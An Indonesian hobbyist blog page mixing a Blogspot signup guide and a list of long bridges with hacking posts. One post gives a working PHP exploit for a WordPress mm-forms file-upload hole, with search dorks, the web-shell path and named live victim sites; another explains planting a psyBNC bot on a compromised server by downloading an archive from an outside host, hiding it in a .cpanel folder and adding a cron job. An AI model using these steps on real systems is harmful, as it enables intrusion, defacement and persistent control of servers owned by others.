Mass Paypal Checker

Written by: Afiq Kurniawan
Catatan Si Ndeso Updated at: Rabu, Juli 09, 2014 Description: Mass Paypal Checker Rating: 4.5 Reviewer: AFIQ KURNIAWAN - ItemReviewed: Mass Paypal Checker

WordPress MM file upload vulnerability

WordPress MM file upload vulnerability

Assalamualaikum
Dan wajib hukumnya menjawab salam, yang gak jawab maho >,<
Explouit ini hampir sama dgn Exploid Wp Store yg kemaren…!! :)
OK tidak usah panjang Lebar
[x] Exploid [x]
<?php
/* example of using
$uploadfile="C:\AppServ\www\Tunisia.php"; */
$uploadfile="Tunisia.php";
$ch =
curl_init("http://[SERVER]/[path]/wp-content/plugins/mm-forms/includes/doajaxfileupload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
/* same php code of "Sammy FORGIT" 's exploits */
?> [x] ——————————– [x]
Dork :
inurl:/wp-content/plugins/mm-forms/ site:Terserah anda
inurl:wp-content/plugins/mm-forms-community/ site:Terserah anda
Screenshot_1
tambahkan ini : /includes/ajaxfileupload.php
Screenshot_2
[+] tempah shell [+]
http://[SERVER]/[path]/wp-content/plugins/mm-forms/upload/temp/shell.php
shell
live Target :
http://smpn1-terbukakandanghaur.sch.id/wp-content/plugins/mm-forms-community/includes/ajaxfileupload.php
http://www.rpctv.com.br/wp-content/plugins/mm-forms-community/includes/ajaxfileupload.php
http://sparc.my/v1/wp-content/plugins/mm-forms/includes/ajaxfileupload.php
Exsample : http://cuaad.mx/ads/ by Antonkill


Greetz : Indonesian Defacer | Indonesian Hacker | My Friends | AntonKill | Uyap | Ksatria | Dasilva | And Biang Kerox Team 



Sumber : Antonkill.wordpress.com
Written by: Afiq Kurniawan
Catatan Si Ndeso Updated at: Kamis, Juli 04, 2013 Description: WordPress MM file upload vulnerability Rating: 4.5 Reviewer: AFIQ KURNIAWAN - ItemReviewed: WordPress MM file upload vulnerability

Cara Membuat Blogspot Terbaru

Blogger.com platform blog yang jadi salah satu blog pilihan blogger Indonesia terutama buat yang baru belajar sepertiku. Walau sebagian blogger pro mencibir blogspot dan selalu membanding bandingkan dengan Wordpress.org blogspot selalu yang utama dihatiku karena dia gratis dan sudah support beragam script dan bisa memasang iklan.

Langsung saja ini langkah demi langkah cara membuat blogger di Blogspot terbaru :

1. Membuat Email di Gmail.com

Blogger.com sudah di akusisi oleh Google jadi langkah pertama dalam membuat blog di blogspot ialah kita wajib untuk memiliki akun GMAIL sebagai  email yang digunakan untu daftar di blogger.com. Walaupun sebenarnya bisa menggunakan email lain tapi percaya deh mending make GMAIL dari awal.

Cara Membuat Email di Gmail
Daftar GMAIL gratis buka www.accounts.google.com lalu klik di pojok kanan atas Create An Account atau Buat Akun bottom yang berwarna merah
membuat akun di Gmail.com

Tinggal isi data data di akun gmail yang akan dibuat seperti nama, tempat tanggal lahir , password dan lain-lain.
Biasanya dalam membuat email di GMAIL kita perlu verifikasi lewat nomor handphone jadi usahakan masukan nomor handphone yang bisa dikirimin sms dari Google untuk verifikasi.
Setelah email di Gmail dibuat baru kita bisa melanjutkan ke step 2 membuat blog.

2. Daftar di Blogger.com
Setelah membuat email di GMAIL sekarang saatnya daftar di www.Blogger.com    
buka www.blogger.com lalu masukkan pasword anda di sandi email
Klik bottom yag dilingkarin Lanjut Keblogger seperti pada gambar dibawah ini
Klik Buat Blog/Create Blog 
1. Klik blog baru
2. Isi judul blog anda
3. isikan alam/domain blog anda
4. pilih themes/tema blog yang anda sukai
5. Klik Buat Blog
Pilih Judul dan Alamat blog.

Judul digunakan sebagai penama blog, misal untuk blog ini dulu kuberi judul Blognya Ayead Tergaptek
Alamat merupakan url alamat blog yang diinginkan misal alamat rhiinie.blogspot.com
Saran Bang Bolon : dalam memilih judul dan nama blog jangan pilih yang aneh atau susah dieja maupun menggunakan simbol yang aneh-aneh. Pilih yang mudah diingat orang lain dan tidak membingungkan.

Memilih Template Blog
Ada berbagai template bawaan dari blogger yang tersedia sobat bisa memilih terserah sesuai dengan yang disuka lalu klik 'Buat Blog'

4. Blog Sudah Jadi
Selamat ! sampai disini blog sudah berhasil dibuat, namun masih kosong. Setelah ini akan ada beberapa hal yang perlu di setting sebelum melakukan posting.

Sumber : Disini
Written by: Afiq Kurniawan
Catatan Si Ndeso Updated at: Selasa, Juni 18, 2013 Description: Cara Membuat Blogspot Terbaru Rating: 4.5 Reviewer: AFIQ KURNIAWAN - ItemReviewed: Cara Membuat Blogspot Terbaru

Jembatan Terpanjang Di Dunia

 Jembatan Terpanjang Di Dunia

Jakarta - Indonesia masih menunggu waktu untuk membangun jembatan terpanjang, yaitu Jembatan Selat Sunda sepanjang 29 km atau 29.000 meter digadang-gadang bakal menjadi jembatan terpanjang di dunia yang menghubungkan Pulau Sumatera dan Pulau Jawa.

Namun negara lain sudah membangun bahkan mengoperasikan jembatan panjang mereka. Yuk, tengok 10 jembatan terpanjang di dunia yang berhasil dihimpun detikFinance dari berbagai sumber, Selasa (14/05/2013).

1. Seven-mile bridge


Seven-mile bridge, panjang 10.887 meter menghubungkan antara Teluk Meksiko dengan daratan di Florida Amerika Serikat.

2. san mateo


San Mateo - Bridge Hayoard, panjang 11.265 meter, melintasi teluk California, San Franscisco Amerika.

3. Union Bridge


Union Bridge, panjang 12.900 meter, menghubungkan antara pulau Prince Edward dengan dataran New Brunswick di Kanada.

4. Rio Bridge


Rio Bridge - Niteroi, panjang 13.290 meter, Menghubungkan kota Rio de Janeiro di Brazil dan Niteroi.

5. Penang Bridge


Penang Bridge, panjang 13.500 meter, menghubungkan antara Pulau Penang dan daratan Malaysia

sumber : detik.com
Written by: Afiq Kurniawan
Catatan Si Ndeso Updated at: Selasa, Juni 18, 2013 Description: Jembatan Terpanjang Di Dunia Rating: 4.5 Reviewer: AFIQ KURNIAWAN - ItemReviewed: Jembatan Terpanjang Di Dunia

Cara Membuat Bot Psy Lewat Shell

Langsung Saja, 
Berikut Langkah-langkahnya : 
1.siapkan shell inject kamu..
2.masuk ke shell inject kamu3.cari permission yang tidak DENIED
kalo nggak ada coba dengan cara : find / -type d -perm 777 lalu execute
3.wget datanya di : http://faiz-caliber.webs.com/psy.tgz
4.tar -zxvf psy.tgz
5. rm -fr psy.tgz
6.masuk ke direktori .cpanel dengan cara :
tambahkan ./cpanel pada kolom di kanan atas
7. ./config (ident) (ip)
example : ./config caliber 12345
8. ./fuck
ntar muncul : * * * * * /var/tmp/.cpanel/y2kupdate >/dev/null 2>&1
9.selanjutnya ketik ./run
nanti muncul
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.

,—-.,—-.,-. ,-.,—.,–. ,-.,—-.

| O || ,-’ \ \/ / | o || \| || ,–’

| _/ _\ \ \ / | o< | |\ || |__

|_| |____/ |__| |___||_| \_| \___|

Version 2.3.1 © 1999-2003

Jatimcom Community Chat

`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-’

Configuration File: Jatimcom

Language File: psyBNC Language File – English
No logfile specified, logging to log/psybnc.log

10.masuk ke irc dan cari channel yang punya bot untuk mengecek ip
caranya : !ip (ip target kamu) (port)
example : !ip 202.182.121.89 3250
jika jawaban dari bot tempat kamu ngecek "Diterima" atau "accepted",,berarti psy mu udah bisa di pakai..
 
Selamat Mencoba,
Sumber : Disini

Written by: Afiq Kurniawan
Catatan Si Ndeso Updated at: Selasa, Juni 18, 2013 Description: Cara Membuat Bot Psy Lewat Shell Rating: 4.5 Reviewer: AFIQ KURNIAWAN - ItemReviewed: Cara Membuat Bot Psy Lewat Shell

PERHATIAN!!

Disclaimer: "Segala bentuk Tutorial yang kami bagikan disini hanya ditujukan sebagai Pengetahuan dan Pembelajaran, Penyalahgunaan atas Tutorial yang ada di blog ini diluar tanggung jawab kami.

Translate

Kategori

Catatan SI Ndeso 2013 . Diberdayakan oleh Blogger.